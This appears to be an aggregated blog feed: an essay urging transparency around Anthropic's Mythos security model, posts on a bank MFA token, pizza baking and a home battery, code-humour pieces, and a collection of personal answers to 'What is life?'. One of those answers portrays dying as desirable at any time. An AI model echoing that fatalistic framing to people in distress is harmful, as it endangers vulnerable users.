This matters. A model that autonomously finds and exploits hundreds of vulnerabilities with inhuman precision is a game changer, but a model that generates thousands of false alarms and non-working attacks still needs skilled and knowledgeable humans. Without knowing the rate of false alarms in Mythos’s unfiltered output, we cannot tell whether the examples showcased are representative.

There is a second, subtler problem. Large language models, including Mythos, perform best on inputs that resemble what they were trained on: widely used open-source projects, major browsers, the Linux kernel and popular web frameworks. Concentrating early access among the largest vendors of precisely this software is sensible; it lets them patch first, before adversaries catch up.

But the inverse is also true. Software outside the training distribution—industrial control systems, medical device firmware, bespoke financial infrastructure, regional banking software, older embedded systems—is exactly where out-of-the-box Mythos is likely least able to find or exploit bugs.

However, a sufficiently motivated attacker with domain expertise in one of these fields could nevertheless wield Mythos’s advanced reasoning capabilities as a force multiplier, probing systems that Anthropic’s own engineers lack the specialized knowledge to audit. The danger is not that Mythos fails in those domains; it is that Mythos may succeed for whoever brings the expertise.

Broader, structured access for academic researchers and domain specialists—cardiologists’ partners in medical device security, control-systems engineers, researchers in less prominent languages and ecosystems—would meaningfully reduce this asymmetry. Fifty companies, however well chosen, cannot substitute for the distributed expertise of the entire research community.

None of this is an indictment of Anthropic. By all appearances the company is trying to act responsibly, and its decision to hold the model back is evidence of seriousness.

But Anthropic is a private company and, in some ways, still a start-up. Yet it is making unilateral decisions about which pieces of our critical global infrastructure get defended first, and which must wait their turn.

It has finite staff, finite budget and finite expertise. It will miss things, and when the thing missed is in the software running a hospital or a power grid, the cost will be borne by people who never had a say.

The security problem is far greater than one company and one model. There’s no reason to believe that Mythos Preview is unique. (Not to be outdone, OpenAI announced that its new GPT-5.4-Cyber is so dangerous that the model also will not be released to the general public.) And it’s unclear how much of an advance these new models represent. The security company Aisle was able to replicate many of Anthropic’s published anecdotes using smaller, cheaper, public AI models.

Any decisions we make about whether and how to release these powerful models are more than one company’s responsibility. Ultimately, this will probably lead to regulation. That will be hard to get right and requires a long process of consultation and feedback.

In the short term, we need something simpler: greater transparency and information sharing with the broader community. This doesn’t necessarily mean making powerful models like Claude Mythos widely available. Rather, it means sharing as much data and information as possible, so that we can collectively make informed decisions.

We need globally co-ordinated frameworks for independent auditing, mandatory disclosure of aggregate performance metrics and funded access for academic and civil-society researchers.

This has implications for national security, personal safety and corporate competitiveness. Any technology that can find thousands of exploitable flaws in the systems we all depend on should not be governed solely by the internal judgment of its creators, however well intentioned.

Until that changes, each Mythos-class release will put the world at the edge of another precipice, without any visibility into whether there is a landing out of view just below, or whether this time the drop will be fatal. That is not a choice a for-profit corporation should be allowed to make in a democratic society. Nor should such a company be able to restrict the ability of society to make choices about its own security.

This essay was written with David Lie, and originally appeared in The Globe and Mail.

365 TomorrowsAutonomous Extension Beyond Initial Task Definitions

Author: AP Ritchey The most powerful artificial intelligence unit ever created was online for less than ten seconds. Well, we gave her ten; she only needed five. To assess her abilities, we created a test program called Sable—the Suborbital Advanced Ballistic Launch Engine. This initiative was designed to use her incalculable computation capacity to calculate […]

The post Autonomous Extension Beyond Initial Task Definitions appeared first on 365tomorrows.

Planet DebianYifei Zhan: CommBank hardware MFA token

A while ago, CommBank started asking for MFA confirmation on its mobile app for every NetBank login on a browser. Previously, there was an option to use SMS for MFA, which isn’t as secure as I would like, but it was at least usable. Since I’m switching away from Android to Mobian and won’t be able to use the CommBank app for much longer, I applied for a physical NetCode token.

The hardware is made by Digipass and looks disposable. It is a small, battery powered gadget with a screen and a button. When pressed, it shows a temporary NetCode for authentication. Such a NetCode is required both for NetBank logins and approving online transactions.

The letter that came with it has the wrong link for activation, the correct link is under NetBank -> Settings -> NetCode (under the Security section)

To apply for a physical token, call the NetBank team, mention you can’t use the app and need a physical NetCode token, and make sure they actually submit your request for a token. It took me 2 calls to get them to ship me a token. The hardware is free of charge but can only be applied for via phone call; unfortunately staff members at my local branch are unable to do anything in relation to NetBank. I was told privately by a CommBank employee that they are deprecating the hardware token in favor of the mobile app, I hope that won’t happen anytime soon, or that they add support for passkeys before they do. The last time I checked, the CommBank app was LineageOS-friendly, but I don’t want to configure WayDroid just to do online banking.

PayID, the thing that allows you to receive payment via a phone number or email address, is not compatible with the hardware token, and existing PayID will be silently deactivated if you use hardware token. This looks to be an artificial restriction; I don’t see why it has to be this way.

Regular CommBank mobile app sessions will also be de-activated once the hardware token is activated (I was told so but my sessions weren’t deactivated until I wiped my Android phone), and you won’t be able to sign into mobile app again until you manually disable the NetCode token.

Online banking has been getting progressively more invasive and anti-user over the last decade, from demanding remote attestation to requiring real time location data, each time locking certain features when those demands are not satisfied; all based on the flawed assumptions that everyone owns a phone running a certain flavor of iOS or Android, and has it ready all the time. I’m not sure what can be done to reverse this trend, but on the personal level I will use NetBank less and go back to cash.

Planet DebianValhalla's Things: Pizza!

Posted on April 18, 2026
Tags: madeof:atoms, craft:cooking

This post contains a bit of consumerism and is full of references to commercial products, none of which caused me to receive any money nor non-monetary compensation.

This post has also been written after eating in one meal the amount of bread-like stuff that we usually have in more than 24 hours.

I’ve been baking bread since a long time ago. I don’t know exactly when, but probably it was the early 2000s or so, and remained a regular-ish thing until 2020, when it became an extremely regular thing, as in I believe I bake bread on average every other day.

In the before times, I’ve had a chance to bake pizza in a wood fired oven a few times: a friend had one and would offer the house, my partner would mind the fire, and I would get there with the dough and prepare the pizza.

Now that we have moved to a new house, we don’t have a good and convenient place for a proper wood fired oven in masonry, but we can use one of the portable ones, and having dealt with more urgent expenses, I decided that just before the potential collapse of the global economy was a good time as any to buy the oven I had been looking at since we found this house.

I decided to get an Ooni Karu 2, having heard good things about the brand, and since it looked like a good balance between size and portability. I also didn’t consider their gas fired ovens (nor did I buy the gas burner) because I’m trying to get rid of gas, not add stuff that uses it, and I didn’t get an electric one because I’m not at all unhappy with the bakery-style pizza we make in our regular oven, and I have to admit we also wanted to play with fire1.

We also needed an outdoor table suitable to use the oven on and store it. Here I looked for inspiration at the Ooni tables (and for cheaper alternatives in the same style), but my mother who shares the outdoor area with us wasn’t happy with the idea of steel2. And then I was browsing the modern viking shores, and found that there was a new piece in the NÄMMARÖ series my mother likes (and of which we already have some reclining chairs): a kitchen unit in wood with a steel top.

At first I expected to just skip the back panel, since it would be in the way when using the oven, but then I realized that it could probably be assembled upside down, down from the top between the table legs, and we decided to try that option.

This week everything had arrived, and we could try it.

Yesterday evening, after dinner (around 21, I think) I prepared the dough with the flour I usually use for bakery-style pizza: Farina di Grano Tenero Tipo 0 PANE (320 - 340 W); since I wanted to make things easier for myself I only used 55% hydration, so the recipe was:

  • 1 kg flour
  • 550 g water
  • 2 g dry yeast
  • 12 g salt

The next time I think I’ll try with one of my other staples: Molino Bogetto etichetta blu (260/280 W)

Then this morning we assembled the NÄMMARÖ, then I divided the dough in eight balls, put them in a covered — but not sealed — container 3, well floured with rice flour and then we fired the oven (as in: my partner did, I looked for a short while and then set the table and stuff), using charcoal, because we already had some, and could conveniently get more at the supermarket.

When the oven had reached temperatures in the orange range4 I stretched the smallest ball out, working on my wooden peel, sprayed it with water5, sprinkled it with coarse salt and put it in the oven.

After 30 seconds I turned it around with the new metal peel, then again after 30 seconds, and then I lost count of how many times I repeated this6, but it was probably 2 or 3 minutes until it looked good.

A flatbread on a regular plate: it's only a bit more than half the plate in diameter, puffed up near the borders and thin in the middle, and only lightly browned in places, not burnt. It's sitting on the lower shelf of a wooden table.

And it was good. The kind of pizza that is quite soft, especially near the borders.

We ate it with fresh mozzarella and tomatoes, and then made another one the same way, to finish the mozzarella.

Another flatbread on the same plate, this time it's about 4 cm smaller than the plate on all sides, and it's covered with brownish-red chopped up vegetables.

This was supposed to be our lunch, but we decided to try one with some leftover cooked radicchio, and that also worked quite nicely.

And finally, we decided we needed to try a more classical pizza, with tomato sauce and cured meat, of which we forgot to take pictures.

Up to here we had eaten about half of the dough, and we were getting full: I had prepared significantly more than what I expected to eat, to be able to accidentally burn some, but also with the idea to bake something else to be eaten later.

So I made two more focaccias with just water and salt, and then I tried to cook some bread with what I expected to be residual heat.

Another flatbread with coarse salt and two bread rolls, one of which is completely carbonized on one side. The other one has been cut, and while it has a carbonized spot, it is also well cooked in the middle, and perfectly edible.

Except that the oven was getting a bit too cold, so my partner added some charcoal, and when I put the last two unflattened balls right at the back of the oven where it was still warmer, that side carbonized. After 5 minutes I moved them to the middle of the oven, and turned them, and then after another turn and 5 more minutes they were ready. And other than the burnt crust, they were pretty edible.

So, the thoughts after our first experience. Everybody around the table (my SO, my mother and me) was quite happy with the results, and they are different enough from the ones I could get with the regular oven.

As I should have expected, it’s much faster than a masonry oven, both in getting to temperature and in cooling down: my plan for residual heat bread cooking will have to be adjusted with experience.

We were able to get it hot enough, but not as hot as it’s supposed to be able to get: we suspect that using just charcoal may have influenced it, and next week we’ll try to get some wood, and try with a mix.

As for the recipe, dividing the dough in eight parts worked quite well: maybe the pizzas are a bit on the smaller side, but since they come one at a time it’s more convenient to cut and share them, and maybe make a couple more at the end.

Of course, I’ll want to try different recipes, for different styles of pizzas (including some almost-trademark-violating ones) and for other types of flatbread.

I expect it won’t be hard to find volunteers to help us with the experiments. :D


  1. any insinuation that there may have been considerations of having a way to have freshly baked bread in case of a prolonged blackout may or may not be based on reality. But it wasn’t the only — or even the main — reason.↩︎

  2. come on! it’s made of STEEL. how can it be not good? :D↩︎

  3. IKEA 365+ 3.1 glass, the one that is 32 cm × 21 cm × 9 cm; it was just big enough for the amount of dough, and then I covered it with a lid that is missing the seal.↩︎

  4. why did they put a thermometer on it, and not add labels with the actual temperature? WHY???↩︎

  5. if you don’t have dietary restrictions a bit of olive oil would taste even better.↩︎

  6. numbers above 2 are all basically the same, right?↩︎

,

Cryptogram Friday Squid Blogging: New Giant Squid Video

Pretty fantastic video from Japan of a giant squid eating another squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Planet DebianRussell Coker: Home Battery

Prices

On the 19th of March I got a home battery system installed. The government has a rebate scheme so it had a list price of about $22k for a 40kWh setup and cost me about $12k. It seems that 40KWh is the minimum usable size for the amount of electricity I use, I have 84 cores running BOINC when they have nothing better to do which is 585W of TDP according to Intel. While the CPUs are certainly using less than the maximum TDP (both due to design safety limits and the fact that I have disabled hyper-threading on all systems due to it providing minimal benefits and potential security issues) given some power usage by cooling fans and some inefficiency in PSUs I think that assuming that 585W is accounted for 24*7 by CPUs is reasonable. So my home draws between 800W and 1KW when no-one is home and with an electric car and all electric cooking a reasonable amount of electricity can be used.

My bills prior to the battery installation were around $200/month which was based on charging my car only during sunny times as my electricity provider (Amber Electric) has variable rates based on wholesale prices. Also the feed in rates if my solar panels produce too much electricity in sunny times often go negative so if I don’t use enough electricity. I haven’t had the electric car long enough to find out what the bills might be in winter without a home battery.

Before getting the battery my daily bills according to the Amber app were usually between $5 and $10. After getting it the daily bills have almost always been below $5. The only day where it’s been over $5 since the battery installation was when electricity was cheap and I fully charged the home battery and my car which used 50KWh in one day and cost $7.87 which is 16 cents per KWh. 16 cents isn’t the cheapest price (sometimes it gets as low as 10 cents) but is fairly cheap, sometimes even in the cheap parts of the day it doesn’t get that low (the cheapest price on the day I started writing this was 20 cents).

So it looks like this may save me $100 per month, if so there will be a 10% annual return on investment on the $12K I spent. This makes it a good investment, better than repaying a mortgage (which is generally under 6%) and almost as good as the long term results of index tracker funds. However if it cost $22K (the full price without subsidy) then it would still be ok but wouldn’t be a great investment. The government subsidised batteries because the huge amount of power generated by rooftop solar systems was greater than the grid could use during the day in summer and batteries are needed to use that power when it’s dark.

Android App

The battery system is from Fox ESS and the FoxCloud 2.0 Android app is a bit lacking in functionality. It has a timer for mode setting with options “Self-use” (not clearly explained), “Feed-in Priority” (not explained but testing shows feeding everything in to the grid), “Back Up”, “Forced Charge”, and “Forced Discharge”. Currently I have “Forced Charge” setup for most sunny 5 hours of the day for a maximum charge power of 5KW. I did that because about 25KW/day is what I need to cover everything and while the system can do almost 10KW that would charge the battery fully in a few hours and then electricity would be exported to the grid which would at best pay me almost nothing and at worst bill me for supplying electricity when they don’t want it. There doesn’t seem to be a “never put locally generated power into the grid unless the battery is full” option. The force charge mode allows stopping at a certain percentage, but when that is reached there is no fallback to another option. It would be nice if the people who designed the configuration could take as a baseline assumption that the macro programming in office suites and functions in spreadsheets are things that regular people are capable of using when designing the configuration options. I don’t think we need a Turing complete programming language in the app to control batteries (although I would use it if there was one), but I think we need clauses like “if battery is X% full then end this section”.

There is no option to say “force charge until 100%” or “force charge for the next X minutes” as a one-off thing. If I came home in the afternoon with my car below 50% battery and a plan to do a lot of driving the next day then I’d want to force charge it immediately to allow charging the car overnight. But I can’t do that without entering a “schedule”. For Unix people imagine having to do everything via a cron job and no option to run something directly from the command-line.

It’s a little annoying that they appear to have spent more development time on animations for the app than some of what should be core functionality.

Management

Amber has an option to allow my battery to be managed by them based on wholesale pries but I haven’t done that as the feed-in prices are very low. So I just charge my battery when electricity is cheap and use it for the rest of the day. There is usually a factor of 2 or more price difference between the middle of the day and night time so that saves money. It also means I don’t have to go out of my way to try and charge my car in the middle of the day. There is some energy lost in charging and discharging the batteries but it’s not a lot. I configured the system to force charge for the 5 sunniest hours every day for 5KW as that’s enough to keep it charged overnight and 5KW is greater than the amount of solar electricity produced on my house since I’ve been monitoring it so that forces it to all be used for the battery. In summer I might have to change that to 6KW for the sunniest 2 or 3 hours and then 4KW or 5KW surrounding that which will be a pain to manage.

Instead of charging the car every day during sunny times I charge it once or twice a week, I have a 3.3KW charger and the car has a 40KWh battery so usually it takes me less than 10 hours to fully charge it and I get at least 5 hours of good sunlight in the process.

There are people hacking on these devices which is interesting to get direct control from computers [1], and apparently not banned from the official community for doing so. I’m not enthusiastic enough to do this, I’ve got plenty of other free software things to work on. But it’s good that others are doing so.

365 TomorrowsThe Last Jump

Author: Ankit Chiplunkar Delta’s vision flashed red. The jump had scraped a meteorite. Error alarms crawled across his vision. He locked motion, started auto-repair, and waited. Delta floated between jumps. As the repairs ran, he thought of the Core. Delta was a Mind, a being made of pure information. Minds built shells, bodies made of […]

The post The Last Jump appeared first on 365tomorrows.

Worse Than FailureError'd: Having a Beastly Time

It's time again for a reader special, and once again it's all The Beast In Black (there must be a story to that nick, no?).

"MySQL is not better than your SQL," he pontificated, "especially when it comes to the Workbench Migration Wizard"

7369002fc20e41b89b64ed7f32ef3641

"Sadly," says he, "Not even gmail/chromium either."

149c9109443f4521b1a38b91bd0bcc22

"Updated software is available, but there are no updates!" he puzzled. "Clicking Install Now just throws that dialog right back in my face. I'm re-cursing." Zero, one, does it really make a difference?

e9ea57c886984dc8a106df503a2fd923

"Questions" The Beast in Black "I do, in fact, have a question..."

f5c83f7bc02644a895f1f9aa5ec368a1

One of the foundational guides to my [lyle, not bib] engineering career was John Bentley's Programming Pearls. These are not those.
"Veni, vidi: vc. No pearls of wisdom here, just litter." says The Beast.

4e13a188deb94473abcc6148d106458c

[Advertisement] Plan Your .NET 9 Migration with Confidence
Your journey to .NET 9 is more than just one decision.Avoid migration migraines with the advice in this free guide. Download Free Guide Now!

,

Planet DebianSahil Dhiman: What is Life (to you)?

It started with a thought: to understand people’s perspectives on life and its meaning. So I texted folks, “What is life (to you)?�. Each of the following list items (-) is a response from a different individual, mostly verbatim.

- A lot

- Everyone has a few universal basic qualities, and some special qualities. To me life is pursuit of exploring world based on those qualities and maturing those qualities as one goes on about exploring world/life with those qualities.
Discovering and enhancing experiences as one goes through them.

- life is endless suffering

- my answer might change daily, but this is what I’ve noticed and feel recently. Life is a spectrum with two distinct ends: what we control and what we don’t. At birth, the spectrum is largely tilted toward control, but throughout our lives, it gradually shifts toward the other side. Ultimately, as we approach death, we lose all control over any aspect of our existence, reaching the other end of the spectrum.
tho this isn’t universal, privilege plays a huge part in what you control tho i believe it holds true for the majority
but yeah man, meaning and purpose are dynamic, it’s in their nature to change i can give you a different answer this evening itself xD

- Funeral Monologue from Synecdoche, New York. https://www.youtube.com/watch?v=Z9PzSNy3xj0

- Zindagi ek nadiya hai, Aur mujhe tairna nahi aata
(translation - Life is a river, and I don’t know how to swim)
On a more serious note, Life is what you make it out for yourself. The only established truth is that it will end. We can never know if there is something after or if there was something before. So try to live a life that you feel aspired by? But this question was beautifully answered by that book which you had about that dying professor
(Me - He was talking about Tuesday’s with Morrie)

- My answer is 42

- One, it’s living on your own terms, you define everything for yourself, success, normal, whatever. You get to curate your version of it no matter the societal norms.
It’s an accumulation of experiences - friends, parents, work, activities, doing shit loads. Sab try karo- travel, zumba, art, music, workout, sports, dil kara ye karna hai karlo. (translation - If your heart wants to do it, just do it.)
Then I think relationships - all that you’ve nurtured, people forget maintaining people because of work. It takes efforts to keep people in your life, everyone that comes has a place in yours, how well thats stays is upto you. You also get to curate your people, who stays who don’t. Family toh hai hi (translation - family is there) but everyone else that comes along can make it pretty good.
So I don’t want to be 50 and be like chalo ab kuch apne liye karte hai… (translation - Come on, now let’s do something for ourselves) Do whatever shit you want today. Not everything costs money, and if it does get thrifty
But do keep healthy while doing all of that

- Being alive so that my daughter can grow up and i can help raising her kids as well. Raising kids without mother is tough :P

- Definitively, I feel like Life is a by product of proteins and energy working together. But in a more personal sense, Life is a dumb joke played onto us. It’s a rat race. But rats exists because of life and then it becomes a chicken-egg problem
Honestly, I don’t give good answers to life questions. I’m generally the one asking
Life can be like a box of chocolates, you don’t know what you’re gonna get untill you experience the chocolate(assuming the chocolates are heterogenous and contains a mix of everything)
Camus once said, “Life is a revolt�, and one of his students added more spice to it like “Life is a revolt against the meaninglessness of existence"
I kinda feel like Life is the pursuit of every person’s search for meaning

- Imprisonment waiting for execution 😄
I have one more thought while we are on the topic , game with pre defined starting position and predefined destination , path to reach is a maze

- A phase where you can have a really good time or really bad one, usually the mix of both. A phase where you are prisoner to responsibility and materialistic wants.
It’s a hell for you, where you try to create heaven for others. Being born was never your choice, but ending is always in your hands but you are a prisoner. You fear that leaving this world behind will destroy the heavens you created for others and they will be back to hell. But eventually everyone moves on watching the hourglass of their life.
Once you are left with no desires or no one to create heavens for, you look arround yourself. You see everyone chasing something, everyone scared of their limitted life time sliping away yet you want it to end sooner.
Doesn’t matter if it was all good till now, or all bad. The other half is waiting for redemption. If it was all good, it’s best time to die don’t wait for the bad to start. If was all bad, it’s still the best time to die what if it was the good one and more worst is waiting for you. We desire to be remembered, yet we want to free from this loop of suffering.
Someone once said, life is a suffering, chose your sufferings.

- Life to me is to live without regrets and live with freedom.
Life is always unpredictable and this unpredictability makes it more interesting and worth it.

- As of now, for the state of mind that I am in , I think for me life is about subtle struggle, subtle inconveniences and yet moving forward cause that’s all I know.
I am not sure if any of this has any meaning, but sometimes I feel I was born of a purpose and that the universe has my back.
For me it’s about raising my consciousness, understanding people to their depths, gaining moderate material success and helping people to some extend.
I have tried to seek a grander meaning but I have failed.
Life for me is what I make out it.
In my times of great success i rarely think about life for I am busy enjoying it, whatever you may call that state of mind.

- For me its the little things that you enjoy with YOUR people

- Life to me is about living and loving, and doing it in a way that sustains. It’s the people who shape you, the work you get absorbed in, the quiet moments in between. There’s also the wanting, the drive to figure out what’s worth going after and how to get there, but that’s just one part of it, not the point of it. And none of it happens in a vacuum. I’m aware of the privileges that let me live this way, and I try to hold on to that gratitude. In the end, life has both a material and a non-material side, and a lot of what we do is chasing material things in an attempt to satisfy something non-material within us

- Mere liye (translation - for me) life is staying at my home and studying random economics papers. That’s when I enjoy myself the most.

- Very complicated
Some days I wish this life never ended and some time I feel it would be better if it stopped at that moment.
It all depends on the events that happen in the so called “life�.
So life to me is a string of events that happen anyway and you get to make some decisions which can turn it in any direction and then you wonder how did that happen.

- not forgetting to breathe, learn, eat, game, take a good shit, love, sleep.

- To be honest it changed with time! At 19 it was about freedom, wasn’t sure what freedom meant but i wanted that! To be free from everything, maybe because parents still controlled a part of my life. Then came 22-24 where i was working, trying to figure out what i want, the meaning changed from freedom to living for myself. To earn more, to be greedy about myself and pursue whatever would help me gain more steps in my career.
Came my mba life, switched my life from doing for myself to trying everything out to have no regrets. Life meaning was just about living with no regrets, invested, gambled, did everything to earn that tag of “yeah, have tried that�. Now it has all switched to, it was all just a fake facade. Life turned to having a meaningful life rather than finding meaning in what i am doing. Living for people around me, chhoti chhoti cheezo m khushi (translation - happiness in small things(?)) isn’t really a topic of conversation but more of happy thing for me. So it changed, and m quite happy to be honest. Life did show me a lot of failures, but was privileged enough to face those failures. Gained a lot of learnings if not money😂
Hopeful for more learnings and change meaning of life with time

- A task.

- You have different answers at different times You learn different meanings at different times When you are studying, basically it is about job, finding a partner then it becomes, house, car other things based on your income in between, there can be passion too
Free Software was a passion, electoral politics too, but both kind of faded and I want cooperative and user driven development now (prav - something that motivates me every day) and these days learning Chinese and watching Cdrama takes a huge part of my leisure time it is heavily subjective and also influences by previous experiences people around you, how much influence they have on you
it also depends on if they had to struggle in their life or not, for some life did not give much troubles and trouble itself can be relative people who never had to struggle may find even smallest challenges as troubles like if you own a car, your worry is finding a parking slot

- I am too young to think about lyfe

- A ticket to see the show on earth, I guess 😀
I guess life is different depending on the mood. It is a very broad question.
(Me - What is it in this present mood?)
Learning stuff (like I am learning a new language) and being happy but also to regulate emotions in a world where being optimistic is getting harder each day.
Life is also having a unique set of glasses you wear. Both in terms of looking from your eyeballs and your psychological perspective. Both are unique and cannot be replicated.
It is interesting what people on their deathbed think of life. If I know I am dying, my perspective would change a whole lot.
Life is finishing reading books while we are alive 😉
Life is sleeping after a good XMPP chat 😉

- Dukh dard peeda (translation - surrow pain suffering)

- uhh to word it? life is just like a journey from A to somewhere and its all about what paths you take and what line you get on to me, just a series of short adventures that all connect to a larger sequence until you can’t have any more adventures-
(Me - eee, THE END. drop dead, like a coin)
yeaaaah- I am not really for spirituality of an afterlife, to me life just ends at some point, after which point there fails to remain a discernable you, and some X time after which, you will be last remembered, try to make that last time a good one I guess?
(Me - no soul?)
uhhh not in the way most people think of it i guess?
theres just a lot of yous, theres the physical you, there is the idea of you, there is the expectation of you, and one of the undefinable you I would label as the soul maybe? like the part thats not physically you, but also certainly you
(Me - can’t say I understood part, but I get you in this sense)
mhm- well its about just questioning who you are more so questioning what life is-, I have sadly spent way too much time trying to figure that out

- Making the best of the time you have

- living a full range of experiences and embracing the good ones, seeing all that the world has to offer. In the end we were always just stardust. Might as well enjoy it when we are stardust with a consciousness of our own.

- For some reason or the Universe’s /dev/random I was born here as a biological being, and from my experience I understood living is hard and the best way to live is by embracing it. Loving everyone and everything around you. Be happy and joyful until you naturally say good bye to this world.

- Life is being fucked by everything and you just have to figure out and try to stick to the things worth being fucked for

Note: Following was transcribed from a audio message.

- There are five conditions to become a life to survive in the environment. I think there’s five conditions by the biological definitions and reproduction is one of the factor virus is not considered a life form because it cannot reproduce on its own but technically it’s kind of a life because it reproduces using the DNA ability this is the biological definition. Do you want a philosophical definition?
My definition is kind of the same except that you get life experiences along with it as a human. Extra benefits is that you are not an NPC. All other organisms are NPCs. But humans can interpret the world and change it to their liking. That is life in the case of a human. But then many humans are mostly NPCs. But they still can change the life. Okay, fuck this. Where is this even going?
A human is an exception in the case of life, because human is not an NPC. Human can interrupt the world, human can change it to its liking, which is why we are such a successful organism on this planet. That is life to me. That’s a human. But all of this is kind of meaningless, because the biological impurity of a human being still exists, so you still have the urges to reproduce, which kind of makes it like just another organism. But then, humans are yet to evolve to overcome that biological imperative.

I’m grateful for all the replies, outlooks, and subsequent conversations I got to have after this question with everyone. After all, it was a deeply personal question. It does fit in nicely with my definition of life:
“Life is all about experiences and all the transient relationships one gets to have with folks we meet on the way.�

Cryptogram Human Trust of AI Agents

Interesting research: “Humans expect rationality and cooperation from LLM opponents in strategic games.”

Abstract: As Large Language Models (LLMs) integrate into our social and economic interactions, we need to deepen our understanding of how humans respond to LLMs opponents in strategic settings. We present the results of the first controlled monetarily-incentivised laboratory experiment looking at differences in human behaviour in a multi-player p-beauty contest against other humans and LLMs. We use a within-subject design in order to compare behaviour at the individual level. We show that, in this environment, human subjects choose significantly lower numbers when playing against LLMs than humans, which is mainly driven by the increased prevalence of ‘zero’ Nash-equilibrium choices. This shift is mainly driven by subjects with high strategic reasoning ability. Subjects who play the zero Nash-equilibrium choice motivate their strategy by appealing to perceived LLM’s reasoning ability and, unexpectedly, propensity towards cooperation. Our findings provide foundational insights into the multi-player human-LLM interaction in simultaneous choice games, uncover heterogeneities in both subjects’ behaviour and beliefs about LLM’s play when playing against them, and suggest important implications for mechanism design in mixed human-LLM systems.

Worse Than FailureCodeSOD: We'll Hire Better Contractors Next Time, We Promise

Nona writes: "this is the beginning of a 2100 line function."

That's bad. Nona didn't send us the entire JavaScript function, but sent us just the three early lines, which definitely raise concerns:

if (res.length > 0) {
  await (function () {
    return new Promise((resolve, reject) => {

We await a synchronous function which retuns a promise, passing a function to the promise. As a general rule, you don't construct promises directly, you let asynchronous code generate them and pass them around (or await them). It's not a thing you never do, but it's certainly suspicious. It gets more problematic when Nona adds:

This function happens to contain multiple code repetition snippets, including these three lines.

That's right, this little block appears multiple times in the function, inside of anonymous function getting passed to the Promise.

No, the code does not work in its current state. It's unclear what the 2100 line function was supposed to do. And yes, this was written by lowest-bidder third-party contractors.

Nona adds:

I am numb at this point and know I gotta fix it or we lose contracts

Management made the choice to "save money" by hiring third parties, and now Nona's team gets saddled with all the crunch to fix the problems created by the "savings".

[Advertisement] Plan Your .NET 9 Migration with Confidence
Your journey to .NET 9 is more than just one decision.Avoid migration migraines with the advice in this free guide. Download Free Guide Now!

365 TomorrowsWitch Moth

Author: A. R. Waking up to a blaring alarm while in a war is nothing out of the ordinary; for Atlas, it happens daily, or a couple of times a month. He would have never thought today would be any different. ​ Stationed on a planet controlled by the Terrestrian Coalition, Atlas was used to […]

The post Witch Moth appeared first on 365tomorrows.

,

Cryptogram Defense in Depth, Medieval Style

This article on the walls of Constantinople is fascinating.

The system comprised four defensive lines arranged in formidable layers:

  • The brick-lined ditch, divided by bulkheads and often flooded, 15­-20 meters wide and up to 7 meters deep.
  • A low breastwork, about 2 meters high, enabling defenders to fire freely from behind.
  • The outer wall, 8 meters tall and 2.8 meters thick, with 82 projecting towers.
  • The main wall—a towering 12 meters high and 5 meters thick—with 96 massive towers offset from those of the outer wall for maximum coverage.

Behind the walls lay broad terraces: the parateichion, 18 meters wide, ideal for repelling enemies who crossed the moat, and the peribolos, 15–­20 meters wide between the inner and outer walls. From the moat’s bottom to the highest tower top, the defences reached nearly 30 meters—a nearly unscalable barrier of stone and ingenuity.

Cryptogram Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.

Worse Than FailureCodeSOD: Three Letter Acronyms, Four Letter Words

Candice (previously) has another WTF to share for us.

We're going to start by just looking at one fragment of a class defined in this C++ code: TLAflaList.

Every type and variable has a three-letter-acronym buried in its name. The specific meaning of most of the acronyms are mostly lost to time, so "TLA" is as good as any other three random letters. No one knows what "fla" is.

What drew Candice's attention was that there was a type called "list", which implies they're maybe not using the standard library and have reinvented a wheel. Another data point arguing in favor of that is that the class had a method called getNumElements, instead of something more conventional like size.

Let's look at that function:

size_t TLAflaList::getNumElements()
{
	return mv_FLAarray.size();
}

In addition to the meaningless three-letter-acronyms which start every type and variable, we're also adding on a lovely bit of hungarian notation, throwing mv_ on the front for a member variable. The variable is called "array", but is it? Let's look at that definition.

class TLAflaList
{
	…
	private:
		TLAflaArray_t mv_FLAarray;
		…
}

Okay, that gives me a lot more nonsense letters but I still have no idea what that variable is. Where's that type defined? The good news, it's in the same header.

typedef std::vector<INtabCRMprdinvusage_t*> TLAflaArray_t;

So it's not a list or an array, it's a vector. A vector of bare pointers, which definitely makes me worry about inevitable use-after-free errors or memory leaks. Who owns the memory that those pointers are referencing?

"IN" in the type name is an old company, good ol' Initrode, which got acquired a decade ago. "tab" tells us that it's meant to be a database table. We can guess at the rest.

This isn't a codebase, it's a bad Scrabble hand. It's also a trainwreck. Confusing, disorganized, and all of that made worse by piles of typedefs that hide what you're actually doing and endless acronyms that make it impossible to read.

One last detail, which I'll let Candice explain:

I started scrolling down the class definition - it took longer than it should have, given that the company coding style is to double-space the overwhelming majority of lines. (Seriously; I've seen single character braces sandwiched by two lines of nothing.) On the upside, this was one of the classes with just one public block and one private block - some classes like to ping-pong back and forth a half-dozen times.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.